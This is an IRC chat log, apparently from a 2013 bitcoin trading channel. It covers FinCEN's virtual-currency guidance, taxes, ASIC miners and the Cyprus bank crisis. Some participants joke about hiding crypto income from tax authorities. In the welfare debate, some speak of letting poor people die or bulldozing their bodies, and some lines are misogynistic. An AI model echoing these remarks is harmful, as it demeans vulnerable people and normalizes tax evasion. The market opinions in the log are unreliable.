05:09:28 This the the DREAM act for bitcoin Mar 19 05:09:34 Amnesty! Mar 19 05:09:38 yes Mar 19 05:09:41 uh wtf happened? Mar 19 05:09:42 free card Mar 19 05:09:44 I missed it Mar 19 05:09:50 you'll just have the same old dinosaurs controlling bitcoin Mar 19 05:09:52 FinCEN issued guidance Mar 19 05:09:56 to be honest id rather go back to cash Mar 19 05:09:58 btc is play money, enjoy Mar 19 05:10:02 link? Mar 19 05:10:16 what a joke Mar 19 05:10:18 I am 75% sure that IRS will issue tax guidance before year end too Mar 19 05:10:21 someone put this into the title Mar 19 05:10:22 http://www.fincen.gov/statutes_regs/guidance/html/FIN-2013-G001.html Mar 19 05:10:40 no surrender imho Mar 19 05:10:42 topic Mar 19 05:10:42 Bugpowder if it reads like youi want it to read we're golden Mar 19 05:10:43 whatever Mar 19 05:11:01 no white flags, only black flags Mar 19 05:11:01 Not out of the woods yet Mar 19 05:11:06 I would keep my coins close Mar 19 05:11:14 this is only revelent to USA people right? Mar 19 05:11:15 don't leave them parked on exchances Mar 19 05:11:18 so i shouldn't give a shit? Mar 19 05:11:28 Naw... Has major exchage rate implications Mar 19 05:11:39 bullshit man Mar 19 05:11:40 If it fucks liquidity that will be bad short term Mar 19 05:11:48 [BTCTC] [ASICMINER-PT] 1 @ 0.831 BTC [-] Mar 19 05:11:49 [BTCTC] [ASICMINER-PT] 1 @ 0.831 BTC [-] Mar 19 05:11:54 But I think the market will view as net positive Mar 19 05:11:56 btc liquidity or fiat liquidity ? Mar 19 05:12:02 they alway hit the money first (fiat Mar 19 05:12:07 USD -> BTC liquidity Mar 19 05:12:13 did they read on that? Mar 19 05:12:18 "users of virtual currency" Mar 19 05:12:18 good luck trying to cash out 1 million dollars Mar 19 05:12:19 i came Mar 19 05:12:22 straight to jail Mar 19 05:12:23 ore just BTC 0-> USD Mar 19 05:12:35 BitHub: You are delusional Mar 19 05:12:40 Cash out 1 million Mar 19 05:12:45 pay taxes Mar 19 05:12:50 why? Mar 19 05:12:52 buy all the girls new tits. Mar 19 05:12:54 show where you bought it from Mar 19 05:12:59 don't go to jail Mar 19 05:13:00 why would you want to cash out to near-worthless fiat? Mar 19 05:13:13 touche Mar 19 05:13:13 mod6: Not worthless yet Mar 19 05:13:13 but why Mar 19 05:13:19 i'm not doing anything criminal Mar 19 05:13:25 house, car ? Mar 19 05:13:25 Suppose you wanted to buy a Tesla. Mar 19 05:13:33 hypothetically Mar 19 05:13:38 tesla? Mar 19 05:13:49 a car Mar 19 05:13:53 suppose you want to give a girl a 2nd pair of tits. Mar 19 05:13:53 Elon has not responded to my tweets re: the Bitcoins for Tesla plan Mar 19 05:13:58 right Mar 19 05:14:01 Bugpowder: acccttuuuaaalllly Mar 19 05:14:03 thats the funny thing Mar 19 05:14:06 BitHub paid for those tits Mar 19 05:14:09 Elon likes Bitcoin but wont publically state it Mar 19 05:14:17 i'm a contractor for BitHub Mar 19 05:14:18 I should DM him Mar 19 05:14:23 shit like this gives Elon a boner Mar 19 05:14:33 Got a friend who has dinner with him occasionally Mar 19 05:14:41 but, not me. Mar 19 05:14:50 some friend Mar 19 05:15:11 Family at SpaceX Mar 19 05:15:15 so is the gov goign to tax me from my job or from bitcoin/ Mar 19 05:15:18 or double dip Mar 19 05:15:26 double dip Mar 19 05:15:30 of course Mar 19 05:15:30 pffft Mar 19 05:15:33 fucking assholes Mar 19 05:15:40 anyway my wallet got hacked Mar 19 05:15:46 ;) Mar 19 05:15:46 sorry gov Mar 19 05:15:54 yeah Mar 19 05:15:56 exactly Mar 19 05:16:05 Its the return of the Honest John system Mar 19 05:16:12 lulz Mar 19 05:16:12 re: tax filing Mar 19 05:16:18 if you never cash Mar 19 05:16:33 yeah got to cash out secretly Mar 19 05:16:37 I might have to take down my localbitcoins profile though Mar 19 05:16:37 that's what the irs ruling will determine Mar 19 05:16:39 like an actual drug deal Mar 19 05:16:40 jesus Mar 19 05:16:51 or buy stuff with them Mar 19 05:16:58 why not just pay tax you fucking leeches Mar 19 05:16:58 gott im himmel Mar 19 05:17:04 I am still waiting for my headphones Mar 19 05:17:07 you get a society, pay for it Mar 19 05:17:09 from bitcoinstore Mar 19 05:17:18 I don't mind paying 15% Mar 19 05:17:23 yeah dub's right we should pay tax on it to get more guns Mar 19 05:17:27 we don't have enough guns in america Mar 19 05:17:28 i live in nigeria i dont have society Mar 19 05:17:28 dub i don't mind paying whores, but only if they're on their knees. Mar 19 05:17:29 i don't feel safe Mar 19 05:17:29 I don't want to pay 39.8% + 13% Mar 19 05:17:31 this society is too uppity. Mar 19 05:17:54 you can also think about taxation as endorsing your local government Mar 19 05:17:56 why pay a middleman that does a shit job at creating a society? Mar 19 05:17:58 do you? Mar 19 05:18:05 BitHub: I dont live in america, I pay tax to get healthcare, education, a working society Mar 19 05:18:11 me too Mar 19 05:18:17 its already at about 30-35 % Mar 19 05:18:18 i don't Mar 19 05:18:19 and yes look after people less useful than me Mar 19 05:18:22 now they want more? Mar 19 05:18:31 but its cheaper to feed them than let them die Mar 19 05:18:52 I pay ~50% tax Mar 19 05:18:55 be happy, you could leave in Cyprus Mar 19 05:18:58 its a sick joke anyway Mar 19 05:19:18 ;;asks 30 Mar 19 05:19:23 ;;bids 30 Mar 19 05:19:26 There are currently 0 bitcoins offered at or under 30.0 USD, worth 0.0 USD in total. | Data vintage: 0.0011 seconds Mar 19 05:19:26 There are currently 148225.44 bitcoins demanded at or over 30.0 USD, worth 5579457.76514 USD in total. | Data vintage: 0.0145 seconds Mar 19 05:19:28 but its cheaper to feed them than let them die try and put real life bullshit rules on me Mar 19 05:19:49 ;;bids 0 Mar 19 05:19:49 There are currently 57979983 bitcoins demanded at or over 0.0 USD, worth 8084076.7019 USD in total. | Data vintage: 23.3481 seconds Mar 19 05:19:54 8M Mar 19 05:19:54 mircea_popescu: having people dying about the place is a big burden on society Mar 19 05:19:55 lame Mar 19 05:19:58 stuck Mar 19 05:20:02 dub ... Mar 19 05:20:04 at 8M Mar 19 05:20:09 show how this costs money. Mar 19 05:20:14 8m Mar 19 05:20:18 its cheaper to give them $20k/year to buy ciggaretes and gamble Mar 19 05:20:22 why don't the gov get their money off google and apple first Mar 19 05:20:27 get them to pay their proper tax Mar 19 05:20:27 dub cheaper than what ? Mar 19 05:20:29 then we can talk Mar 19 05:20:29 not really. Healthcare is the main gov cost Mar 19 05:20:30 its cheaper in the long run to let them die off Mar 19 05:20:38 or will be soon Mar 19 05:20:40 big blowout around 10m Mar 19 05:20:41 fucking idiots Mar 19 05:21:22 mircea_popescu: cheaper than scraping them up out of teh gutter Mar 19 05:21:28 so broke, they'll have to live by china's rules soon anyway Mar 19 05:21:31 dub are you kidding ? Mar 19 05:21:36 not at all Mar 19 05:21:38 you can do that with power tools, costs nothing per pound Mar 19 05:21:46 its also a shitload cheapt than sticking them in prison Mar 19 05:21:50 cheaper* Mar 19 05:21:56 and the value of me showing random forum idiots what happens iof they continue is > 9000 Mar 19 05:22:24 this is the problem with unbeaten children and "everyone living comfortably" Mar 19 05:22:27 there's no motivation left. Mar 19 05:22:30 well the reality is this shit is factually correct Mar 19 05:22:34 and without motivation there's no education. Mar 19 05:22:52 dub not rly. you just want it to be correct so as not to be forced to reevaluate the coolaid you've been fed. Mar 19 05:22:57 cut off the entitlements. that will make them choose between work or death. remove the safety nets that are being used like hammocks. Mar 19 05:23:05 no, I understand the economics of it Mar 19 05:23:09 mkay. Mar 19 05:23:14 what you are advocating for is america Mar 19 05:23:18 and that is clearly working well Mar 19 05:23:25 not rly. Mar 19 05:23:49 i mean forget the strawmen and red herrings for a second. Mar 19 05:24:06 the cost of pushing dead bodies with a bulldozer vs the cost of pretending like the idiots are people. Mar 19 05:24:13 five degrees of magnitude ? six ? nine ? Mar 19 05:24:24 stick to the economics of it. Mar 19 05:24:52 the problem is pushign the dead into a hole is not the only cost, there is fallout Mar 19 05:25:17 here we go again, make something illegal for the lil guys, but really expensive licencing for the big boys Mar 19 05:25:31 dub so you posit. Mar 19 05:25:42 familiar with the millions for defense but not a penny in bribes line ? Mar 19 05:26:21 would you pay a guy alot of your money if all he did was cockblock you from a really hot girl all the time? Mar 19 05:26:22 How expensive will this licensing actually be? Mar 19 05:26:31 ok, perhaps the problem is that we are already at a toage of societal evolution where reverting ro your ideal is not feasable Mar 19 05:26:36 expensive, bet your ass on that Mar 19 05:27:12 dub let's find out shall we. Mar 19 05:27:16 Money Transmitter license Mar 19 05:27:17 not without some genocide at the front Mar 19 05:27:22 Lawyers are expensive, but its still pretty hard to hit $1MM on a single tranactional licensing setup Mar 19 05:27:24 as long as i got the money you're not telling me what's feasible. Mar 19 05:27:27 How do you feel about your tax dollars supporting guys like this that are so pathetic they can't even move their bodies down to Walmart to wait in line to buy Diablo 3: http://www.youtube.com/watch?v=XJtDUZMSOBw Mar 19 05:27:59 tax is just another life's scams Mar 19 05:30:01 bitcoin is pretty much the end of mandatory taxation. society will have to cope. Mar 19 05:30:07 you want to be helped, give me a good reason. Mar 19 05:30:13 mircea_popescu: exactly. Mar 19 05:30:14 that starts with doing an excellent cocksucking job. Mar 19 05:30:19 it does NOT start with threatening me. Mar 19 05:30:27 haha Mar 19 05:30:30 i'll just have you shot, a bullet is cheaper. Mar 19 05:30:32 government's that actually work Mar 19 05:30:38 derp Mar 19 05:30:41 governments Mar 19 05:30:48 shit yeah oh i totally get it Mar 19 05:30:53 government as a service Mar 19 05:30:56 yup Mar 19 05:31:02 police wants money ? start asking people to donate. Mar 19 05:31:07 you piss people off ? guess what. no budget. Mar 19 05:31:08 your first statement mircea brings me alot of relief Mar 19 05:31:15 hohohohoho Mar 19 05:31:15 socialism ("free" stuff from government) disrupts natural selection. Mar 19 05:31:17 watch cops help old ladies cross the street on this model. Mar 19 05:31:35 socialism does nto provide free stuff Mar 19 05:31:37 cops may actually have to engage in dialogue with citizens Mar 19 05:31:46 about what should be enforced Mar 19 05:31:47 benkay yes. with their hats in their hands. Mar 19 05:31:48 intead of just beating them? Mar 19 05:31:55 cops will realize that yes, we are their boss and not the other way around. Mar 19 05:31:55 There are almost 40,000 registered money transmitters in the US Mar 19 05:32:01 mind = blown Mar 19 05:32:06 and cops are already scum of the earth Mar 19 05:32:09 It costs $1000 to register in Washington state Mar 19 05:32:11 http://mortgage.nationwidelicensingsystem.org/slr/PublishedStateDocuments/WA-Currency-Exchange-Company-New-App-Checklist.pdf Mar 19 05:32:15 ahaha Mar 19 05:32:16 and Mar 19 05:32:17 AND Mar 19 05:32:22 if you are not good at anything you become a cop or a teacher Mar 19 05:32:26 first thing I found Mar 19 05:32:27 departments aren't interdependent Mar 19 05:32:37 forest service can accept "tithe" Mar 19 05:32:40 or whatever Mar 19 05:32:46 so can dod Mar 19 05:32:49 nsa Mar 19 05:32:51 omgomgomgomg Mar 19 05:32:52 dub: well said Mar 19 05:32:52 if you can handle a mop you go into the janitorial arts which probalby pays better Mar 19 05:32:57 SO..... If coinlab can't handle something of this moderate level of effort and cost, I don't want to deal with them Mar 19 05:33:22 i know how we can get more people employed. eliminate minimum wage and entitlements. Mar 19 05:33:28 i haven't felt like this since reading ayn rand as a wee one Mar 19 05:33:34 LOL Mar 19 05:33:54 benkay: thats all well and good, but really you are just reinventing states Mar 19 05:34:23 dub nope. the us is puritan-stupid, for one. Mar 19 05:34:26 one must keep riff raff like you out Mar 19 05:34:31 so you just need a 1000$ licence? Mar 19 05:34:33 and moreover, they're about as socialist as the uk by now Mar 19 05:35:06 this enables sea farming Mar 19 05:35:09 So, my reading of the FinCEN guidance is more positive now that it is established that it costs $1000 to register in WA. I don't know if that let's you operate in other states as well, but if you need to register in all states then lets say $50,000 and a pain in the ass. Mar 19 05:35:39 and pay coporate tax Mar 19 05:35:46 BitHub: Looks like it. It would take some lawyer time to make sure the t's are crossed and i's dotted. Mar 19 05:36:04 and lawyer fees Mar 19 05:36:17 sooo... bitbet dividends for march revised upwards. Mar 19 05:36:18 Sure. But this is PEANUTS for a real company Mar 19 05:36:31 right Mar 19 05:36:33 Series A should cover it an amore Mar 19 05:36:37 and more Mar 19 05:36:48 on top of 20+ btc expected from bet resolutions there's about 10btc or so coming from people who tried to leech the btc/usd rate bet and got in too late. Mar 19 05:37:06 so better to have paypal in there then say give me a go Mar 19 05:37:10 they tried to game the weight along side of the exchange rate? Mar 19 05:37:34 mod6 yeah. Mar 19 05:37:40 anyway, thats interesting. thanks for the heads up mp. Mar 19 05:37:53 it's reallty delicious when wanna-be cheaters get rammed. Mar 19 05:38:03 =) Mar 19 05:40:28 mpex.co seems to work fine for me over http now Mar 19 05:40:32 btw Mar 19 05:40:40 ;;goxlag Mar 19 05:40:41 0.907938 seconds Mar 19 05:41:37 !ticker m ^OIX Mar 19 05:41:38 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 37.53972864 / 42.55721868 / 57.53184036 (20165 shares, 3,142.64 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 19 05:41:55 they are refunded if they come before bet is closed but after the event Mar 19 05:42:04 if the bet is already closed Mar 19 05:42:06 then no. Mar 19 05:45:24 !ticker m s.bbet Mar 19 05:45:24 [MPEX:S.BBET] 1D: 0.0018 / 0.0018 / 0.0018 (17450 shares, 31.41 BTC), 7D: 0.0015 / 0.00189869 / 0.002014 (48750 shares, 92.56 BTC), 30D: 0.0015 / 0.00180983 / 0.002014 (135256 shares, 244.79 BTC) Mar 19 05:45:36 !l m s.bbet Mar 19 05:45:38 Last trade for S.BBET on MPEX was at 0.0018 BTC [+] Mar 19 05:45:45 nice kakobrekla Mar 19 05:46:11 :p Mar 19 05:46:27 need a volume data point maybe Mar 19 05:46:59 you can only abuse it 3 million times Mar 19 05:47:13 heheh Mar 19 05:49:46 > however this stock is going to be better than fiat. Mar 19 05:49:55 chang you are full of wisdom Mar 19 05:50:10 dog shit is better than fiat. Mar 19 05:50:19 at least you can fertilize Mar 19 05:53:14 growing up here in the U.S. I was taught to hate all paper currency that wasn't backed by sound money. but then they go, "well, except we don't have the ``gold-standard'' any more since they went off the Bretton Woods system." "Ummm.. so what do they do now???" "Well they say we have this petro-dollar"... Mar 19 05:54:02 "ok so why did we go off the gold standard?" "to pay for the vietnam war.." "so what do we do when it goes to 0?" "hopefully that'll be long after we're gone..." Mar 19 05:54:19 lol **** BEGIN LOGGING AT Tue Mar 19 10:13:23 2013 Mar 19 10:13:43 !ticker m s.dice Mar 19 10:13:45 [MPEX:S.DICE] 1D: 0.0051 / 0.0051 / 0.0051 (6827 shares, 34.82 BTC), 7D: 0.00444444 / 0.00514061 / 0.00599987 (76348 shares, 392.48 BTC), 30D: 0.00300001 / 0.00609701 / 0.0069 (2300180 shares, 14,024.24 BTC) Mar 19 10:18:20 [MPEX] [S.MPOE] 1544 @ 0.00073702 = 1.138 BTC [-] Mar 19 10:18:22 [MPEX] [S.MPOE] 7570 @ 0.00073701 = 5.5792 BTC [-] Mar 19 10:32:19 damn i should buy some platinum... Mar 19 10:32:41 or maybe not, its not like people are making cars... :/ Mar 19 10:33:35 wtf is palladium so damn high Mar 19 10:33:44 i remeber buying it at 180 Mar 19 10:34:15 Rhodium is cheap too, hmm Mar 19 10:48:21 [MPEX] [S.MPOE] 5827 @ 0.0007431 = 4.33 BTC [+] Mar 19 10:49:13 Looks like I'm only earning 4 BTC weekly on my stuff... Mar 19 10:52:44 Seems little. Mar 19 10:52:56 Guess I need to keep working on my portfolio. Mar 19 11:08:37 $800 a month not bad, but why not just asicminer? :) Mar 19 11:50:40 I got a bit of ASICMINER. Not enough in my taste but anyway. Mar 19 11:51:43 I'll be heading off. Mar 19 11:51:57 5:51 am already... Mar 19 12:03:31 !ticket btctc ASICMINER-PT Mar 19 12:03:37 !ticker btctc ASICMINER-PT Mar 19 12:03:39 [BTCT:ASICMINER-PT] 1D: 0.82 / 0.85386 / 0.870899 (86 shares, 73.4 BTC), 7D: 0.695 / 0.79714 / 0.9489 (1507 shares, 1201.3 BTC), 30D: 0.65 / 0.74566 / 1 (2960 shares, 2207.2 BTC) Mar 19 12:04:11 ;;asks 53 Mar 19 12:04:16 There are currently 921.05612 bitcoins offered at or under 53.0 USD, worth 48812.979279 USD in total. | Data vintage: 0.0012 seconds Mar 19 12:04:18 ;;last Mar 19 12:04:18 [03:04:10] ;;asks 53 Mar 19 12:05:08 batch 3 worth getting? Mar 19 12:07:50 avalon? Mar 19 12:08:04 yeah Mar 19 12:08:18 without doing the math and the guess work, i would say i think so Mar 19 12:08:37 trippy Mar 19 12:08:51 has bfl shipped yet? Mar 19 12:09:29 ;;asks 53 Mar 19 12:09:34 There are currently 722.61371 bitcoins offered at or under 53.0 USD, worth 38298.5268802 USD in total. | Data vintage: 0.0012 seconds Mar 19 12:09:42 ;;asks 52.99 Mar 19 12:09:42 There are currently 0 bitcoins offered at or under 52.99 USD, worth 0.0 USD in total. | Data vintage: 7.9715 seconds Mar 19 12:12:29 ;;asks 52.99 Mar 19 12:12:33 There are currently 38.803471 bitcoins offered at or under 52.99 USD, worth 2056.19594419 USD in total. | Data vintage: 0.0013 seconds Mar 19 12:14:56 ;;goxlag Mar 19 12:24:56 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 19 12:28:54 going for 54 Mar 19 12:28:59 ;;ticker Mar 19 12:28:59 BTCUSD ticker | Best bid: 53.11001, Best ask: 53.48997, Bid-ask spread: 0.37996, Last trade: 53.11001, 24 hour volume: 86658.81830554, 24 hour low: 47.31000, 24 hour high: 53.87500, 24 hour vwap: 49.98340 Mar 19 12:31:08 ;;asks 34 Mar 19 12:31:08 There are currently 0 bitcoins offered at or under 34.0 USD, worth 0.0 USD in total. | Data vintage: 20.6629 seconds Mar 19 12:31:11 ;;asks 54 Mar 19 12:31:11 There are currently 482.93073 bitcoins offered at or under 54.0 USD, worth 26065.6459656 USD in total. | Data vintage: 23.7521 seconds Mar 19 12:31:26 wow only 482 Mar 19 12:31:33 ;;asks 55 Mar 19 12:31:33 There are currently 6252.8908 bitcoins offered at or under 55.0 USD, worth 342685.770975 USD in total. | Data vintage: 45.6435 seconds Mar 19 12:31:48 6k is kinda of a wall :/ Mar 19 12:33:15 ;;gox lag Mar 19 12:33:16 Error: "gox" is not a valid command. Mar 19 12:33:19 ;;goxlag Mar 19 12:33:20 0 seconds Mar 19 12:45:09 ;;asks 54 Mar 19 12:45:09 There are currently 897.77964 bitcoins offered at or under 54.0 USD, worth 48343.2061181 USD in total. | Data vintage: 33.4904 seconds Mar 19 13:03:09 >I totally agree and we understand this. Timing is crucial and we have only a couple of months to make serious profits. Bitfury did not sleep for last 2 days :-) Mar 19 13:03:11 hehe Mar 19 13:08:02 ? Mar 19 13:08:05 i lack context Mar 19 13:08:17 asic Mar 19 13:08:25 oh right Mar 19 13:08:41 are they selling batch 3 now? Mar 19 13:09:02 avalon? Mar 19 13:09:03 this is bitfury Mar 19 13:09:14 yeah Mar 19 13:09:18 worth getting? Mar 19 13:09:32 what is bitfury? Mar 19 13:09:57 is bitfurry one of the fake asics? Mar 19 13:10:05 well, he he has the best know-how of them all Mar 19 13:10:20 what's this password thing? Mar 19 13:10:54 im not sure who is doing the bitfury, i did not follow that stuff to closely Mar 19 13:11:08 bitfury is doing it Mar 19 13:11:10 :p Mar 19 13:11:19 never heard of them, Mar 19 13:11:34 are you on the same internet as we are? Mar 19 13:11:57 yawn Mar 19 13:12:02 ;;ticker Mar 19 13:12:03 BTCUSD ticker | Best bid: 53.60000, Best ask: 53.69991, Bid-ask spread: 0.09991, Last trade: 53.60000, 24 hour volume: 87411.56184324, 24 hour low: 47.31000, 24 hour high: 53.87500, 24 hour vwap: 50.02467 Mar 19 13:12:28 okay i did look at them before and assumed scam Mar 19 13:12:37 not a scam?? Mar 19 13:13:31 well dunno about the whole picostocks thingy Mar 19 13:15:12 hmm im going to pass Mar 19 13:15:16 for now at least] Mar 19 13:16:33 hmm did they deliver the fcpga? Mar 19 13:16:53 hm got booted Mar 19 13:16:56 12:16.27 ( kakobrekla ) [12:13:26] well dunno about the whole picostocks thingy Mar 19 13:17:09 but someone dumped him 350k to make the prototype chip Mar 19 13:17:32 vampireb yup but the devices never seen the light of public Mar 19 13:17:38 one of my friends got it Mar 19 13:17:51 twas a 10 chip spartan board Mar 19 13:17:51 hmm Mar 19 13:17:57 each runnin at 300mhash Mar 19 13:18:37 if real might be a great buy Mar 19 13:20:00 imma gonna try to get a board Mar 19 13:20:06 i just woke up Mar 19 13:20:26 ;;ticker Mar 19 13:20:27 BTCUSD ticker | Best bid: 53.88798, Best ask: 53.88880, Bid-ask spread: 0.00082, Last trade: 53.88880, 24 hour volume: 87468.56354421, 24 hour low: 47.31000, 24 hour high: 53.88880, 24 hour vwap: 50.03290 Mar 19 13:20:53 anyone paid with bitpay on here before? Mar 19 13:20:58 looks like avalon is gearing for number 3 Mar 19 13:20:58 woot Mar 19 13:21:04 There's no account i set up,right? Mar 19 13:21:13 no account no Mar 19 13:21:16 i used them with namecheap Mar 19 13:21:19 ok Mar 19 13:21:26 did avlon ship number 2? Mar 19 13:21:34 not that i know of Mar 19 13:21:42 did they fully ship #1? Mar 19 13:21:54 they have until the 15th according their website Mar 19 13:22:08 they should by now. lots of ppl are reporting that they got theirs Mar 19 13:22:13 i assume the rest are hush hush Mar 19 13:22:17 ok Mar 19 13:22:33 i wonder if number 3 is a good buy Mar 19 13:22:58 i wouldnt mind reselling them Mar 19 13:23:07 too bad they dont sell single modules Mar 19 13:23:08 dunno why Mar 19 13:23:13 would be so easy Mar 19 13:23:29 mhm, id love another module on mine actually Mar 19 13:23:41 id put one in the computah Mar 19 13:23:42 you have one now? Mar 19 13:23:45 i'm still waiting for avalon batch 1 Mar 19 13:24:11 its hard for me to order batch 3 with not fully on batch 1 Mar 19 13:24:17 its why i wont do bfl :/ Mar 19 13:24:23 better than bfl Mar 19 13:24:28 infinitely better than bfl, actually Mar 19 13:24:40 shit and better shit is still shit :/ Mar 19 13:25:06 ;;asks 54 Mar 19 13:25:06 There are currently 579.33782 bitcoins offered at or under 54.0 USD, worth 31281.906441 USD in total. | Data vintage: 40.3135 seconds Mar 19 13:25:44 [MPEX] [O.BTCUSD.P750T] 2 @ 0.50754217 = 1.0151 BTC [-] Mar 19 13:25:48 suddenly people who have money in their mattress seem so fucking smart Mar 19 13:25:59 lol Mar 19 13:26:13 smarter than people with money in cypriot banks Mar 19 13:26:14 :) Mar 19 13:26:20 i have cas coin under my pillow Mar 19 13:26:23 less smart than people with money in bitcoins Mar 19 13:26:29 I wanna travel to some other countries.. Mar 19 13:26:34 2/3 of the money is russian money.. and tehy thought the russan govt would tax it, muhahahaha Mar 19 13:26:39 but I fear I might be a target as a tourist Mar 19 13:26:39 lol Mar 19 13:26:48 rape target? Mar 19 13:26:55 nah, ransom one Mar 19 13:27:07 rape and ransom then. Mar 19 13:27:10 lol Mar 19 13:27:57 id need some sort of body guard Mar 19 13:28:02 yeah i was paranoid too when i was checkin prime miner Mar 19 13:28:14 so only took 1k btc with me Mar 19 13:28:18 i think ill just stay in canada. ive seen too many beheadings Mar 19 13:28:36 mexico is one scary place Mar 19 13:29:33 lol Mar 19 13:29:51 i have been around, even war zones, no one has ever fucked with me Mar 19 13:30:04 pirate fucked with you Mar 19 13:30:07 thailand seems a scary place too. ive seen bloated bodies everywhere Mar 19 13:30:15 tho, the food is pretty nice Mar 19 13:30:20 that is what i hear kakobrekla Mar 19 13:30:23 lots of trap it seems Mar 19 13:31:18 ;;ticker Mar 19 13:31:19 BTCUSD ticker | Best bid: 53.99001, Best ask: 54.00000, Bid-ask spread: 0.00999, Last trade: 54.00000, 24 hour volume: 87866.28367331, 24 hour low: 47.31000, 24 hour high: 54.00000, 24 hour vwap: 50.05095 Mar 19 13:31:48 [MPEX] [O.BTCUSD.P750T] 2 @ 0.50663276 = 1.0133 BTC [-] Mar 19 13:31:52 ;;bc,convert eur Mar 19 13:31:53 1 BTC = 53.98003 U.S. dollars = 41.7027426 Euros Mar 19 13:32:06 42 is alright. Mar 19 13:32:36 the answer to everything ya know... Mar 19 13:32:58 cyprus losses are positive for the euro Mar 19 13:33:22 hm? Mar 19 13:34:23 people will now do due deligience when choosing banks vs accepting any ridiculous interest rate Mar 19 13:34:40 and deposit losses are deflationary Mar 19 13:34:45 the interests rate is going negative Mar 19 13:35:02 there goes 54 Mar 19 13:35:07 because credit is contracting Mar 19 13:35:25 I checked my bank, they advertised 1.89% GIC for 18 months as sizzling rate Mar 19 13:35:27 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 19 13:35:30 all the deposits have been lent out Mar 19 13:35:31 its all thin Mar 19 13:35:49 losing 9% is better then losing 100% Mar 19 13:35:55 after 55 nothing really to 60 Mar 19 13:36:03 ;;asks 55 Mar 19 13:36:07 There are currently 5818.8542 bitcoins offered at or under 55.0 USD, worth 319138.813903 USD in total. | Data vintage: 0.0012 seconds Mar 19 13:36:17 bowjob: most of the depositors in cyprys were earning high rates for a decade + Mar 19 13:36:18 could take a day Mar 19 13:36:24 how much? Mar 19 13:36:33 bowjob: the cyprus banks held all their $$ in greek bonds Mar 19 13:36:56 greek bonds :) silly russians Mar 19 13:37:16 sure when deposit insurance guarantees your account Mar 19 13:37:21 you dont care what the bank does with the $ Mar 19 13:37:45 the depositers are recieving a great deal, 9% loss or 100% Mar 19 13:37:49 [MPEX] [O.BTCUSD.P750T] 2 @ 0.50663276 = 1.0133 BTC [-] Mar 19 13:38:07 same is in the US, all deposits have been lent out, they are sitting in mortgages, ccs, bonds, carloans Mar 19 13:39:03 it's a wonderful life? Mar 19 13:39:21 yes, you don't actually have money in the bank Mar 19 13:39:30 you have a promise from the bank to pay you when you ask Mar 19 13:39:42 yes Mar 19 13:40:03 if rates rise in the US the entire banking system will be insolvent Mar 19 13:40:10 so the insurance is not being paid? lulz, time for scammer tag Mar 19 13:40:10 and there wont be quality assets for the fed to buy Mar 19 13:40:11 cyprus situation is fucked up Mar 19 13:40:21 scammer tag on cyprus govt? Mar 19 13:40:26 :) Mar 19 13:40:36 chaang: its impossible for the government to insure the accounts, the insurance fund does not even cover 1% Mar 19 13:40:52 chaang: for example in the US, the FDIC has maybe 1% in reserve to cover deposits Mar 19 13:41:02 scammer tag time then? Mar 19 13:41:59 mjr_: depositors had over 2 years to realize cyprus banks were bust Mar 19 13:42:31 how is it a sudden thing? everyone knew cyprus banks held all their assets as greek bonds Mar 19 13:42:48 why were the locals all surprised, did they not read the news for the last 24 months lol Mar 19 13:43:16 that is not the point Mar 19 13:43:30 i am sure lots of people (prob those least likely to be harmed) got their money out Mar 19 13:43:50 the point is i gave you money, you said it was insured and that you would pay it when i asked, you broke your promise to pay Mar 19 13:44:06 thats your fault for trusting in government Mar 19 13:44:15 since all you gave me in return for my money was your promise to pay, the fact that you can't do that one thing...scammer Mar 19 13:44:25 you have thousands of years of history to look back on government defaulting Mar 19 13:44:30 oh of course Mar 19 13:44:35 and i don't keep money in banks Mar 19 13:44:39 btc FTW Mar 19 13:44:58 not to mention cyprys residents had 6 years since greece became shaky Mar 19 13:45:04 i'm just saying, more than likely it will be small business owners and average working people who will be hurt in cyprus Mar 19 13:45:21 well theres a reason they are average and working Mar 19 13:45:24 they weren't using the bank as a "tax haven" they were using it as a "bank" Mar 19 13:45:45 anyway, i'm with you on that, don't trust govt or banks Mar 19 13:45:53 just saying, this is the reason i don't trust them Mar 19 13:45:57 instead of spending most of their time watching sports and drinking wine they should have devoted even 30minutes to read the bear case Mar 19 13:46:06 whether they should have seen it coming does not excuse the fact that they did that Mar 19 13:46:42 and again, they get hurt, but not because they deserve it, it is of course in their best interest to look out for themselves and not get hurt Mar 19 13:46:55 but you still can find fault with the one hurting them Mar 19 13:47:08 i think people should lose 100% of their deposits Mar 19 13:47:11 globally Mar 19 13:47:33 teach people a good lesson about being naive and lazy Mar 19 13:48:24 tiberiusiv, can i extend that to coinbr? but i have everything on mpex anyway :/ Mar 19 13:48:47 all global deposits are lent out Mar 19 13:49:50 lol listen tiberiusiv, something like a 30 to 40% haircut => collapse. Mar 19 13:50:13 you cant really avoid it though Mar 19 13:50:21 the debt has already been created Mar 19 13:50:44 70 years of debt creation has to end at some point Mar 19 13:51:09 this is true, but no government ever has or ever will survive a one third haircut of assets. Mar 19 13:51:16 that's roughly the equivalent of foreign invasion. Mar 19 13:51:19 plus all the real wealth in the world will not be lost Mar 19 13:51:35 well the only other option is to attempt to inflate away Mar 19 13:51:51 indeed. Mar 19 13:51:54 problem with that arguement is the debt size is simply too large Mar 19 13:51:58 nah. Mar 19 13:52:06 nothing is too large for inflation. Mar 19 13:52:34 in advanced economies the bond markets are huge, they will increase rates on any inflate attempts Mar 19 13:52:58 total credit market debt in US is 58trillion, bernanke is having a difficult time creating 3tril Mar 19 13:53:43 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Mar 19 13:53:45 mircea: if it wasnt too large to inflate, then greek bonds would have been made 100% whole Mar 19 13:54:08 tiberiusiv there's a problem of marginality here,. Mar 19 13:54:15 inflate for the greeks ? why ? Mar 19 13:55:01 you arent bailing greeks out but greek creditors Mar 19 13:55:13 which are trade surplus nations like germany Mar 19 13:55:30 trade surplus just means "we make things people want" Mar 19 13:55:45 no it means you run a vendor financing model Mar 19 13:55:55 germany sends products out on credit Mar 19 13:56:21 the "export" economy will collapse Mar 19 13:56:52 think of germany as a large department store, and all of its customers use only the store credit card to purchase goods Mar 19 13:57:02 then the bill comes due and no one can pay Mar 19 13:57:26 in the meantime all your factories are leveraged to the hilt from borrowing to expand, to meet fake demand Mar 19 13:57:42 that is germany Mar 19 14:00:37 well... perhaps exaggerated but certainly something to it. Mar 19 14:01:08 notice how german industry bought up so many firms over the last decade? Mar 19 